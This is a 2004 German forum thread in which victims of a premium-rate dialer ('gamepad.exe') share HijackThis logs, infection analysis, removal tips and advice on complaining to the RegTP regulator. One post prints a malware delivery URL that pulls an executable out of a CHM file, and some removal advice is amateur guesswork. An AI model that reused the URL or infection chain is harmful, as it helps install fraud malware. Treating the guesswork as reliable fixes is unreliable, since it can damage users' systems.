Hab mich soeben um diesen Eintrag 'gekümmert' - morgen werde ich berichten ob sich dadurch etwas geändert hat....


----------



## virenscanner (14 April 2004)

War zumindest *der* Eintrag, der mir ins Auge stach. Dann bis demnächst.


----------



## niblo (14 April 2004)

Die gamepad.exe wollte bei mir auch gerade wieder zuschlagen. Wichtig ist, dass man die RegTP kontaktiert. Ich habe mich dafür an folgende E-Mail Adresse gerichtet:  [email protected]
Ich bin ja fast schon "froh", dass ich nicht der einzige bin. Wobei das natürlich kein Grund zum freuen ist.

Vielleicht sollte man sich auch mal an bekannte Online-Magazine oder sowas wenden.  Es wäre ja schön, wenn darauf früher Aufmerksamkeit gemacht wird, als bei dieser "Matlock-Geschichte". Oder man mailt mal dem Herrn von Planetopia-Online:........
Der Typ rockt nämlich. 

_persönliche Daten gelöscht , siehe :
http://forum.computerbetrug.de/rules.php#9 _


----------



## Anonymous (14 April 2004)

Tja...das wars wohl nicht. Neustart, der Eintrag war zwar weg - aber dier Dialer trotzdem wieder da. Hier der neue Log:

Logfile of HijackThis v1.97.7
Scan saved at 00:40:14, on 14.04.2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
d:\Programme\AVPersonal\AVWUPSRV.EXE
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\Fast.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\taskswitch.exe
C:\WINDOWS\System32\fast.exe
C:\Programme\Microsoft Hardware\Mouse\point32.exe
C:\Programme\ASUS\Probe\AsusProb.exe
D:\Programme\Roxio\WinOnCD 5 PE\DirectCD\DirectCD.exe
C:\Programme\QuickTime\qttask.exe
C:\Programme\Java\j2re1.4.2_03\bin\jusched.exe
D:\Programme\McAfee\QuickClean\PlgUni.exe
C:\Programme\Gemeinsame Dateien\Real\Update_OB\realsched.exe
C:\Programme\Winamp\winampa.exe
C:\WINDOWS\System32\ctfmon.exe
C:\WINDOWS\System32\RUNDLL32.EXE
D:\PROGRA~1\AIM95\aim.exe
C:\Programme\Internet Explorer\iexplore.exe
C:\WINDOWS\svchost.exe
C:\Programme\McAfee\McAfee Shared Components\Instant Updater\RuLaunch.exe
C:\Programme\TerraTec\DMX 6fire\DMX6Fire.exe
C:\Programme\Teledat\IWatch.exe
C:\Programme\Internet Explorer\iexplore.exe
C:\Programme\Outlook Express\msimn.exe
C:\WINDOWS\System32\ShellExt\gamepad.EXE
D:\Programme\ICQ\ICQ.exe
C:\WINDOWS\Explorer.EXE
C:\Dokumente und Einstellungen\Stefan S\Lokale Einstellungen\Temp\Temporäres Verzeichnis 4 für hijackthis.zip\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.kaffee-netz.de/
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - D:\Programme\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - d:\Programme\Spybot - Search & Destroy\SDHelper.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [BackgroundSwitcher] C:\WINDOWS\System32\bgswitch.exe
O4 - HKLM\..\Run: [CoolSwitch] C:\WINDOWS\System32\taskswitch.exe
O4 - HKLM\..\Run: [FastUser] C:\WINDOWS\System32\fast.exe
O4 - HKLM\..\Run: [POINTER] point32.exe
O4 - HKLM\..\Run: [ASUS Probe] C:\Programme\ASUS\Probe\AsusProb.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [Mirabilis ICQ] D:\Programme\ICQ\ICQNet.exe
O4 - HKLM\..\Run: [AdaptecDirectCD] "D:\Programme\Roxio\WinOnCD 5 PE\DirectCD\DirectCD.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Programme\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Programme\Java\j2re1.4.2_03\bin\jusched.exe
O4 - HKLM\..\Run: [Imonitor] "D:\Programme\McAfee\QuickClean\PlgUni.exe" /START
O4 - HKLM\..\Run: [TkBellExe] "C:\Programme\Gemeinsame Dateien\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [WinampAgent] C:\Programme\Winamp\winampa.exe
O4 - HKLM\..\Run: [dlr] C:\WINDOWS\netstat.exe
O4 - HKLM\..\Run: [System Process] C:\WINDOWS\svchost.exe /i
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\System32\NVMCTRAY.DLL,NvTaskbarInit
O4 - HKCU\..\Run: [AIM] D:\PROGRA~1\AIM95\aim.exe -cnetwait.odl
O4 - HKCU\..\Run: [McAfee.InstantUpdate.Monitor] "C:\Programme\McAfee\McAfee Shared Components\Instant Updater\RuLaunch.exe" /STARTMONITOR
O4 - HKCU\..\RunOnce: [ICQ] D:\Programme\ICQ\ICQ.exe -trayboot
O4 - Global Startup: DMX 6fire 2496 ControlPanel.lnk = ?
O4 - Global Startup: ISDNWatch.lnk = C:\Programme\Teledat\IWatch.exe
O4 - Global Startup: PlexTools Professional.lnk = D:\Programme\Plextor\PlexTool.exe
O8 - Extra context menu item: Mit dem LeechGet Wizard laden - file://D:\Programme\LeechGet 2004\\Wizard.html
O8 - Extra context menu item: Mit LeechGet herunterladen - file://D:\Programme\LeechGet 2004\\AddUrl.html
O8 - Extra context menu item: Mit LeechGet parsen - file://D:\Programme\LeechGet 2004\\Parser.html
O9 - Extra 'Tools' menuitem: Sun Java Konsole (HKLM)
O9 - Extra button: ICQ Pro (HKLM)
O9 - Extra 'Tools' menuitem: ICQ (HKLM)
O9 - Extra button: AIM (HKLM)
O16 - DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} (QuickTime Object) - http://www.apple.com/qtactivex/qtplugin.cab
O16 - DPF: {0DF86CB3-1923-11D5-B470-0050BA1B3C6F} (JpegServerPushControl Class) - http://217.6.17.16/ConvisionVideo.cab
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} (Shockwave ActiveX Control) - http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
O16 - DPF: {1D4DB7D2-6EC9-47A3-BD87-1E41684E07BB} - http://ak.imgfarm.com/images/nocache/funwebproducts/SmileyCentralInitialSetup1.0.0.6.cab
O16 - DPF: {56336BCB-3D8A-11D6-A00B-0050DA18DE71} (RdxIE Class) - http://software-dl.real.com/06a3390390e71a3d5622/netzip/RdxIE601_de.cab
O16 - DPF: {62475759-9E84-458E-A1AB-5D2C442ADFDE} - http://a1540.g.akamai.net/7/1540/52...pple.com/mickey/de/win/QuickTimeInstaller.exe
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?37987.4421180556
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{0EFCB7CF-AE96-4422-BE15-5968F02A1826}: NameServer = 192.168.121.252,192.168.121.253
O17 - HKLM\System\CCS\Services\Tcpip\..\{CC47D214-CE27-471D-A85F-18C359759BB3}: NameServer = 192.168.0.99
O17 - HKLM\System\CS1\Services\Tcpip\..\{0EFCB7CF-AE96-4422-BE15-5968F02A1826}: NameServer = 192.168.121.252,192.168.121.253


----------



## virenscanner (14 April 2004)

O4 - HKLM\..\Run: [System Process] C:\WINDOWS\svchost.exe /i 

Ich habe selber kein XP. Da bei XP die svchost.exe unter Windows\system32 liegt, finde ich diesen Eintrag zumindest "merkwürdig". 
Geh doch mal auf die Datei c:\Windows\svchost.exe und lass Dir die Eigenschaften (Hersteller etc...) anzeigen.


----------



## Anonymous (14 April 2004)

Hallo!
Ich bin immernoch der Meinung das es etwas mit der "lsass.exe" zu tun hat. Bei mir hat sich genau zu dem Zeitpunkt diese Datei in C:\Windows\ eingenistet, als ich den Dialer zum ersten Mal bemerkt habe. Auch in dem oben angegebenen Log befindete sich neben der wohl "normalen" "lsass.exe" in C:\WINDOWS\system32\ auch noch eine in  C:\WINDOWS\ . Auch bei mir sind zwei dieser Freunde aktiv (einer in C:\WINDOWS\system32\ und einer in C:\WINDOWS). Die "neue" Datei in C:\WINDOWS ist zudem versteckt.
In der Registry lässt sich unter anderem auch folgender Eintrag finden:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "Update"="C:\\WINDOWS\\lsass.exe /i"

Bitte klärt mich auf, wenn das oben beschriebene vollkommen normal ist.


----------



## Anonymous (14 April 2004)

hi @

ich habe ihn mir auch gefangen  :cry:  habe mit ihn seit 4 tagen zu kämpfen. obwoll ich so weit alles gelöscht haben kommt er wider :evil: und ich weis auch net voher. Er nistet sich bei mir hier ein C:\WINDOWS\Prefetch\Gamepad.exe und da sind 2 bis 3 einträge.
das einzige was er noch bewirken kann bei mir ist das er nur meine verbindung trennt sich aber nicht mehr einniestet :lol:  habe ihn so gesagt die tür geschlossen unter C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Microsoft\Network\Connections\Pbk bei XP auf eigenschaften und schreibgeschütz machen und nun kann er sich nicht mehr einwählen bzw die vorhanden verbindung deaktieviren
aber wie bekommt mann das ding kommplet von der platte????

mfg GitS


----------



## virenscanner (14 April 2004)

O4 - HKLM\..\Run: [System Process] C:\WINDOWS\lsass.exe /i 

Ist auch zu "fixen".

(Wobei ich mir schon fast sicher bin, dass diese "lsass.exe" mit der "svchost.exe" identisch seien dürfte)


----------



## Anonymous (14 April 2004)

Hallo,

ich habe mir den Dialer auch eingefangen, und zwar auf so einer "Gallerie"  Seite. Was ich im Moment rausgefunden habe, ist das über einen Bug in ActiveX der Pfad c:\java\javainfo.exe (vielleicht kann der Name varieren) erstellt wird, dann wird die Datei ausgeführt, die wiederrum eine .exe erstellt (oder runterlädt) die einen wechselnden Namen hat und sich entweder im Windir oder im Anwendungsdaten Ordner befindend. Die Namen lauten meist wie Systemprozesse, winlogon.exe, csrss.exe,lsass.exe usw. (Kann man nur daran erkennen, das der Benutzername im TaskManager nicht! SYSTEM lautet). Außerdem wird eine Regkey zum automatischen Starten erstellt. Meistens heißt der SystemUpdate2 oder sowas. Danach wird c:\java gelöscht und der Dialer ist druff.

Die Winlogon.exe o.ä. erstellt dann wiederrum in unregelmäßigen Intervallen die ShellExt\gamepad.EXE und führt sie aus. Nach  der Einwahl löscht sich gamepad.EXE wieder.

Außerdem wird auch manchmal eine Hook_dll.dll erstellt die irgendwelche API Calls hooken soll, keine Ahnung welche.

Um es noch lustiger zu machen, scheint es mehrere Versionen dieses Dialers zu geben. Der Beweis hier:
x	11.04.2004	16:06:43	(A) C:\WINDOWS\System32\ShellExt\gamepad.EXE	090090000606 RASAPI32 GEBLOCKT
x	08.04.2004	17:35:28	C:\WINDOWS\System32\ShellExt\gamepad.EXE	090090000928 RASAPI32 GEBLOCKT
x	05.04.2004	15:26:58	C:\WINDOWS\System32\ShellExt\gamepad.EXE	090090000928 RASAPI32 GEBLOCKT

Naja, mehr weiß ich im Moment auch noch nicht, nur das ich 2mal c.a. je 5 Minuten damit Online war. Hoffen wir das beste.

P.S.: Wer der gamepad.exe noch hat, möge sie mir bitte zuschicken  ..... [at] web.de

P.P.S.: Weg kriegt man das ding, indem man den RegKey löscht, neustartet, die o.g. .exe löscht und ActiveX deaktiviert. Dann kommt er auch nicht wieder drauf.


_E-Mail Addi gelöscht siehe Nutzungsregeln 
http://forum.computerbetrug.de/rules.php#10
tf/Moderator
 Hinweis:  die Löschungen der E-Mail-Addis erfolgen in jedem Fall auch wenn sie "verschleiert" werden _


----------



## gueder (14 April 2004)

> Wobei ich mir schon fast sicher bin, dass diese "lsass.exe" mit der "svchost.exe" identisch seien dürfte)



so scheint es.

um die sache unauffällig zu gestalten, werden dateien nach win diensten benannt, allerdings im ordner c-windows abgelegt.

man sollte vor allem mal die autostarteinträge überprüfen.

die gamepad.exe konnte ich sichern als 0900 warner gewarnt hat, sobald man die warnung mit "unterbinden" wegklickt, verschwindet gamepad.EXE inklusive dem ordner in dem es sich installiert  hat.

wahrscheinlich läd die als dienst getarnte datei die gamepad.exe aus dem web nach, sobald der einsatz der gamepad.exe beendet ist oder man eine verbindung unterbindet, löscht sich die datei.

ich habe mal ein paar grafiken angefügt.


----------



## Anonymous (14 April 2004)

Bin totaller Laie, was Pc/Dialer betrifft...Ich habe ebenfalls csrss.exe 3.244K (aber nur einmal) in meinen Task-Manager...Hab ich jetzt diesen Dialer, von dem ihr spricht?


----------



## Aka-Aka (14 April 2004)

@kurze frage: wenn der Dienst von "System" ausgeführt wird, ist es ein normaler Dienst. Hast Du eine crss.exe irgendwo anders? (c:\...) dann wäre es vielleicht komisch.


@gueder:

In Deinem Beispiel mit der Autostartdatei finde ich etwas seltsames (siehe Bild): Das würde nämlich bestätigen, was ich dauernd schon vermute: Man kriegt einen "normalen" registrierten Dialer und etwas anderes noch dazu (genauer gesagt wohl eher umgekehrt) [edit: Denn dieser Autostarteintrag ist für das "Sysupdate" des "aconti"-Dialers, eben int#####.exe]

[edit: Da die bei der RegTP genannte Einwahladresse zu einem aconti-Dialer führt, lag für mich die Vermutung nahe, dass der "gamepad.exe-Dialer" damit zusammen hängt. Dieses Missverständnis wird hier ein paar Beiträge weiter unten geklärt...]


----------



## Anonymous (14 April 2004)

*Frage*

Hallo,

bin neu hier, habe (oder hatte?) auch diesen Virus, Antivir hat einiges gelöscht, ich habe jetzt sicherheitshalber auch noch die Datei winlogon.exe gelöscht (war bei mir im Ordner system, habe win 98).

Kenne mich überhaupt nicht aus, würde aber gerne wissen, ob ich diese Löschung rückgängig machen soll.

Bob


----------



## SDJungle (14 April 2004)

Ich glaube ich hab ihn:



> O4 - HKLM\..\Run: [dlr] C:\WINDOWS\netstat.exe



Zumindest hat sich der Dialer heute noch nicht wieder blicken lassen, nachdem ich gestern vor dem Herunterfahren über diese Datei gestolpert bin. Darin verbarg sich nicht etwa MS als Hersteller, sondern letztlich die Signatur des Dialers 'DIAL/300475'


----------



## Anonymous (14 April 2004)

Hab auch die gamepad.exe angezeigt bekommen, die netstat.exe finde ich allerdings nicht im Windows-Ordner...
Kann ich den Dialer irgendwo über die Registry finden/Löschen? Ad-Aware findet nichts. Gibts es eigentlich ein Sicherheitsupdate bei MS für solche Dialergeschichten oder kümmern die sich net um sowas?


----------



## gueder (14 April 2004)

@ Aka-Aka

sorry, ich hatte den aconti dialer nur getestet, dateien gelöscht usw. dabei hab ich den autostart vergessen. ich bin mir da ziemlich sicher, dass der nichts mit diesem dialer hier zu tun hat, das hat ein weiterer test bewiesen.

@ sdJungle

richtig, das könnte sein, wenn du xp hast, wobei netstat.exe im original unter system32 liegt. wenn die datei 25 kb hat, kannst du ziemlich sicher sein, dass es sich um das programm handelt, welches die gamepad.exe vom web runterläd.

http://216.115.95.98//38ble.chm::/wincfgid.exe

[die url ist ungefährlich für webbrowser]

dieser eintrag hier ist das übel, irgendjemand hatte den hier gepostet. so wird der dialer aktiviert, es wird eine hilfedatei (38ble.chm) runtergeladen und dann sogleich die wincfgid.exe gestartet, die sich getarnt in der hilfedatei befindet. diese wincfgid.exe kreiert dann die gefakten win systemdateien im ordner c\windows\, alle müssten eine größe von 25 kb haben. und diese falschen systemdateien legen sich in den autostart und versuchen dann, alle 5 minuten (bei mir) die dialerdatei gamepad.exe aus dem web runterzuladen, schlägt der versuch der anwahl fehl, löscht sich die gamepad und das spielchen beginnt erneut.

so ähnlich müsste das ganze ablaufen.

eine dieser falschen dateien wollte übrigens gerade auf google zugreifen, zumindest gehört die url zu google. (siehe bild)


----------



## Anonymous (15 April 2004)

Tja, bin auch neu hier und habe das Ding ebenfalls drauf. Bei mir ist allerdings das Problem das ich bis zu meinem Umzug vor kurzem noch DSL hatte und mich die Dialer Problematik nicht gescherrt hat. Momentan bin ich etwas am rotieren was man machen könnte da das Teil zwischen 50 und 100 Stunden drin gewesen sein könnte, da ich den PC praktisch den ganzen Tag anhabe, auch wenn ich nicht zu Hause bin. Ich habe nun (berechtigt) Angst das ich das Zahlen muss, was bei 2 euro pro minute mal locker im 5 Stelligen Bereich enden kann. Wenn ihr irgendwelche Infos habt, sprich von welcher Webseite oder irgendwelche Dateien die mir in einem Strafrechtlichen Prozess helfen könnten, dann her damit. Denn ich habe das Problem das er sich momentan gar nicht mehr einloggt und wenn er sich selbst gelöscht hat währe mein einziger Beweis weg.


----------



## niblo (15 April 2004)

*Hallo Mit-Betroffener*

Hallo Mit-Betroffener!
Ich würde mich umgehend mit der RegTP in Verbindung setzen.  [email protected]
Die Brüder brauchen mal 'n bisschen Druck  8)


----------



## Anonymous (15 April 2004)

Also ich habe der RegTP schon eine Mail geschickt. Aber nichtsdestotrotz, was ist wenn der Dialer sich selbst gelöscht hat, und die mir dann einen anderen Dialer zeigen und behaupten ich hätte den benutzt. Ich meine der Dialer den die Leute hier und ich haben ist bei der RegTP gar nicht aufgeführt. Die Sache ist nur das zu Beweisen.


----------



## PaX (16 April 2004)

*Was die RegTP telefonisch sagte....*

Hallo Leutz! 

Ich hab grad mit der RegTP gesprochen. Der Dialer ist dort schon sehr sehr gut bekannt.... Die wissen auch noch nicht, wie man den vernünftig vom System bekommt. 

Fest steht, dass DIESER Dialer nicht gesetz-konform ist. Der sehr freundliche Herr von der RegTP hat mir empfohlen, doch mal beim Staatsanwalt ne Klage anzuleiern. Er meinte, natürlich könnte die RegTP die Nummer platt machen, aber dann würden die Täter einfach nur wieder ne neue aufmachen. Also sollte man das wirklich mal als Straftat aktenkundig machen. 

Damit dürfte wohl feststehen, dass man die Gebühren, die durch diesen Dialer entstanden sind, nicht zahlen muss. Glücklich sind aber wiedermal die Leutchen mit einer Rechtsschutzversicherung - die können das entspannt dem Anwalt übergeben...


----------



## niblo (16 April 2004)

*Re: Was die RegTP telefonisch sagte....*

Das ist großartig. Ich persönlich warte ja noch auf eine Antwort-Mail, aber werde es wohl auch eher telefonisch regeln.
Und wie machst du deiner Telefongesellschaft jetzt klar, dass du die Kosten nicht tragen musst? Bekommst du einen Beleg von der RegTp?


----------



## Reducal (16 April 2004)

*Re: Was die RegTP telefonisch sagte....*



			
				niblo schrieb:
			
		

> Bekommst du einen Beleg von der RegTp?


Dafür ist die RegTP nicht da - bedient Euch derer Datenbanken auf www.regtp.de
Bei einem Widerspruch gucken auch die Mitarbeiter der Telefonunternehemen (T-Com, Arcor usw.) in diese Datenbanken. Ist eine Nummer / ein Dialer dort nicht aufgeführt (registriert) dann wird der Widerspruch i. d. R. ohne weiteres akzeptiert.


----------



## PaX (16 April 2004)

Vielleicht sollte ich noch erwähnen, dass die RegTP zwar einen Dialer für diese Nummer registriert hat, aber dass die Dialer nicht extra getestet werden. Schließlich lassen die sich ja von der Firma bescheinigen, dass der Dialer nach gültigem Recht arbeitet. Trifft dies nicht zu, dann entzieht die RegTP - auch nachträglich - die Zulassung (siehe Spiegel-Artikel).

Wenn ich mein Gespräch mit denen aber richtig deute, dann stink es denen, dass sie den bösen Dialern ständig die Nummern entziehen, nur damit die Täter wieder eine neue aufmachen. Daher würden sie es wohl gern sehen, dass die Betroffenen ein Verfahren starten. 

Ich vermute aber auch, dass das nicht wirklich erfolgsversprechend ist. Wenn man die Nachrichten über solche Dialer verfolgt, dann kommt man an die Leutchen ja doch nicht ran. Es wird also noch so einige Nachbesserungen an den Gesetzen und Methoden geben müssen...


----------



## Anonymous (17 April 2004)

*hosts.vbs und gamepad.exe*

Hallo zusammen,

bin zwar eigentlich ein ziemlicher Laie, habe aber glaube ich eine Entdeckung gemacht. Da ich eine Einzelauflistung meiner Verbindungen habe, kann ich genau sehen, wann sich dieser Dialer eingewählt hat. Am gleichen Tag genau 8 min vorher wurde die datei "hosts" im Windowsverzeichnis gelöscht und durch eine neue datei hosts.vbs ersetzt. Das hat mein Virenscanner irgendwann erkannt und ich habe leider diese hosts.vbs gelöscht. Ich bin allerdings ziemlich sicher, dass dort auch ein Aufruf zur gamepad.exe stand (habe sie vor dem Löschen editiert). Vielleicht bringt das ja irgend einen Computerchecker hier weiter. Oder war das schon allen längst klar?

Ciao


----------



## Aka-Aka (17 April 2004)

Ich weiß nicht, inwieweit das bekannt oder relevant ist...

Im Oktober und November z.B. haben Leute im Abakus-Forum eine veränderte hosts-Datei gepostet, die enthielt so ziemlich alle Dialerdownloadseiten, die ich kenne inkl. der zugehörigen Webmasterprogramme usw. 

In dieser geänderten Datei stehen u.a. (willkürliche Auswahl)

tscash, stardialer, 0190-dialer,sex-explorer, sendman, aconti, online-dialer, usw. usf., aber auch "ganz normale" ad-banner.

Wenn ich das richtig verstehe, wird irgendwie beim Aufruf einer bestimmten domain zufällig eine domain dieser LIste angesteuert. Das Thema ist also nicht neu, nichtsdestotrotz natürlich möglicherweise sehr spannend...

Vielleicht müsste das mit der hosts-Datei mal jemand erklären


----------



## Fidul (18 April 2004)

Falls zu jeder der erwähnten üblen Websites die IP 127.0.0.1 zugeordnet ist, handelt es sich einfach um eine Methode, jeden Zugriff darauf ins Leere laufen zu lassen.


----------



## Anonymous (18 April 2004)

*gamepad exe*

Hi, ich habe ebenfalls das Problem. Im Ordner Windows prefetch legt sich dieser Dialer an. Ich kenne aber leider die dll dazu nicht. Wenn der Dialer versucht, sich einzuwählen, wird er von meinem Dialerschutz super geblockt, nur, die Leitung die ich vorher hatte, wurde getrennt. Selbst nach Löschen aus dem o.a. Verzeichnis hat sich die Sau nach 3 Tagen ´trotz Löschens ( auch aus Papierkorb) wiederhergestellt. Schredern läßt sich die Gamepad exe auch nicht, also ein echtes Problem. Wer kann mir sagen, wie er das Ding erfolgreich eleminiert hat.


----------



## virenscanner (18 April 2004)

Ein HiJackThis-Log wäre eventuell hilfreich...


----------



## Anonymous (18 April 2004)

*HiJackThis-Log*

was ist das : HiJackThis-Log


----------



## virenscanner (18 April 2004)

Das Logfile, welches HiJackThis ( http://www.spywareinfo.com/~merijn/files/HijackThis.exe ) erstellt...


----------



## Anonymous (18 April 2004)

*Gamepad exe*

Hi Virenscanner, ich habe mir gerade die A² Software gezogen, die angeblich alles findet blockt und zerstört, was Dialerähnlich oder Trojaner oder sonst was ist. Ich habe die getarnten Hilfedateien gelöscht, die Gamepad aus prefetch Verzeichnis und jetzt wollen wir mal sehen.

Für alle, die noch einen guten Dialer Controller brauchen: dialer-control.de, da gibt es kostenlos sehr gute Dialer Controller


----------



## Anonymous (18 April 2004)

Also ich bin mir ziemlich sicher das ich das Teil nun wieder los bin. Ich habe die Registry editiert und den RUN Aufruf der lsass.exe (weitere Varianten mit anderen jeweils ca. 25kb grossen Dateien sind wohl im Umlauf) gelöscht. Ausserdem habe ich natürlich die aufgerufene Datei gelöscht (in meinem Fall die lsass.exe in C:\Windows). Seit dem hat sich der Dialer nicht mehr gemeldet. Ob noch irgendwelche DLLs rumgeistern weiss ich nicht.
Ziemlich einfach, aber oft hilfreich ist es mal nach Dateien zu suchen, die angelegt/modifiziert wurden zur Zeit der ersten Einwahl. Auf diese Weise habe ich meinen "Freund" gefunden.


----------



## PaX (18 April 2004)

Hallo Leutz!

Ich habe heute mal wieder meinen PC angeworfen (mich hatte es ja letzten Samstag erwischt). Das ISDN-Kabel hängt daneben, aber anstonsten ist unser 'Freund' wohl noch sehr aktiv!

Ich habe nämlich den Verdacht, dass er mir heute den [email protected] unterschieben wollte. Das hat mein (stetig aktualisierter ) Virenjäger natürlich unterbunden, aber Ihr könnt Euch vorstellen, dass ich große Augen gemacht habe   ...

Andere Quellen kommen übrigens nicht in betracht: Mein Mailserver hat einen eigenen Virenscanner drauf, und mein PC ist auch bestens geschützt. Der Virenjäger hat kurz nachdem der PC komplett hochgefahren war und ich noch keine Taste angerührt hatte Alarm gegeben. 

Na, ist das ein Hammer??? :machkaputt:


----------



## Hadley (19 April 2004)

*Mich hats auch erwischt!*

Jetzt hat mich dieser @~#+!-Dialer auch erwischt. Und ich dachte mein PC wäre sicher.

Wie wäre es, wenn wir uns zusammenschliessen? Schließlich bin ich wohl nicht der Einzige der sich dies Mistteil eingefangen hat.

Also ich surfe jetzt auf X-Seiten nur noch mit "hoher Sicherheit".

mfg
Hadley


----------



## Stalker2002 (19 April 2004)

*Re: Mich hats auch erwischt!*



			
				Hadley schrieb:
			
		

> Jetzt hat mich dieser @~#+!-Dialer auch erwischt. Und ich dachte mein PC wäre sicher.
> 
> Wie wäre es, wenn wir uns zusammenschliessen? Schließlich bin ich wohl nicht der Einzige der sich dies Mistteil eingefangen hat.
> 
> ...



Ich besurfe solche Seiten nur mit "noch höherer Sicherheit"™, auch als  Firefox-Browser bekannt.

MfG
L.


----------



## Hadley (19 April 2004)

*Firefox*

@Stalker:
Danke für den Link, den Browser kannte ich noch gar nicht. Lade ihn gerade runter. Mir gefällt der Werbebanner bei Opera nämlich nicht so besonders.

mfg
Hadley


----------



## Anonymous (20 April 2004)

*+25€ telefonrechnung*

Hi Leude!

Als ich am Samstag die telefonrechnung öffnete traf mich der schlag, angeblich hatte ich eine 0900 Nummer 14 min lang angewählt. 
Nach einniger recherche hab ich rausgefunden, dass es n dialer ist *G*

meine Frage ist: sollte ich mich bei der RegTP melden, obwohl die schon von der nummer wissen (090090000928)? oder reicht es einfach die rechnung -25€ zu bezahlen?

PS:1.  bis dato hat sich noch kein weiterer dialer zu wort gemeldet ( auf der rechnung), heisst das, dass die oben genannten datein (netstat,svchost,...) bei mir noch normal laufen?
2. ich hab win 2000 und kann im Task Manager nicht sehen, ob System oder nicht ist, gibt es da eine Alternaive herauszufinden, ob Normal oder Dialer??


----------



## Anonymous (21 April 2004)

*090090000606 - die nummer zum glück*

090090000606... nun hatte sie mich auch am wickel ... auf jeden fall: nach dem neuen dingenskirchengesetz der regulierungsbehörde ist das m.e. nicht koscher. ich habe nicht darum gebeten (und schon gar nicht einen entsprechenden mausklick ausgeführt), dass mein rechner davon belagert wird. zum glück war bald schluss damit - zunächst dank verbindungswächter; was gab's danach auf'm rechner (win98) zu entdecken? 
w.exe (ich glaub in c:\),
sysdllc.exe,
sysdllc.lgc - die letzten beiden liefen fröhlich vor sich hin im hintergrund.

merkwürdigerweise hatte ich dann auch diverse trojaner: TR/ByteVerify.1.A,
TR/ByteVerify.1.B,
TR/ByteVerify.1.D: schön verpackt in einem file count[1].jar (BlackBox.class, Dummy.class, VerifierBug.class) in den temporary internet files; 
und: TR/Barole.A.5, zu finden in c:\link.exe und wieder in den  temporary internet files (link[1].exe).
diese trojaner gibt's in keinem online-viren-lexikon. 

dank datenbank der reguleriungsbehörde weiß ich nun: die nummer ist vergeben an: Life & ART Consulting AG; sitz in amiland; für deutschland verantwortlich: 
......
(Alleinvorstand)
Life & ART Holding AG
Postfach 1612
55386 Bingen am Rhein
[email protected]

diesen herren findet man dann auch in den foren der wallstreet-online AG; irgendwie erscheint der knabe nicht gerade in bestem licht, auch bei seinen anderen geschäften. sein bild im netz (lifeandartgroup.com)  könnte fast auf der seite erscheinen, wo es den dialer gratis gibt   

bei der reggulierungsbehörde kann man sich beschweren: 0180 5 34 25 37 oder [email protected] ... aber, damit sie vor gericht auch bestehen können, wollen sie beweise: den dialer, screenshots. leider habe ich das ding nicht aufbewahrt ...  

_persönliche Daten gelöscht, siehe Nutzungsregeln
http://forum.computerbetrug.de/rules.php#9
tf/moderator _


----------



## Anonymous (21 April 2004)

*090090000606*

was die regulierungsbehörde braucht, um selber zu ermitteln, ist ein aktueller link, der einem todsicher den bösen dialer einbringt - wer möchte sich freiwillig opfern?    

angeblich sollen die seiten, die einen wider willen ärmer machen, ständig wechseln ... was die regulierungsbehörde braucht: einen MOTVIERT surfenden mitarbeiter   oder einen aktuellen hinweis von geschädigten: [email protected]regtp.de


----------



## Anonymous (22 April 2004)

*Die Leude vom Rhein*

Als ich eben Bingen lies fiel mir auch wieder der Begünstigten meines Dialer Schadens ein -M. P., .., 55....Bingen. Scheinbar scheint es dort eine Ansammlung von diesen Leuten zu geben.

cu

Xabbu

*[Virenscanner: Name und Strassennamen gelöscht]*


----------



## Anonymous (22 April 2004)

*090090000928 Dialer*

Hallo Betroffene,

habe auch gestern eine Telefonrechnung erhalten, die die oben genannte Nummer mit 5 Positionen an unterschiedlichen Tagen an manchen Tagen mehrmals aufweist. Effekt bis jetzt sind satte 100 Euro!!!!!!!!! Die Beträge werden verwaltet von BT GmbH und erscheint auch komplett mit Adresse und Tel. Nr. auf dem Einzelgesprächsnachweis der Telekom.
Wie ich zu den Kosten gekommen bin, war mir bis jetzt völlig schleierhaft. Habe aber eure Beiträge nun mit großem Interesse gelesen und kann mir nun vorstellen, wie so was entsteht.
Ich würde sagen hier ist mit höchster Priorität zu verfahren den Abzockern das Handwerk zu legen und hier muß schnell gehandelt werden, denn sonst entstehen Schäden in Millionenhöhe für die Anwender.
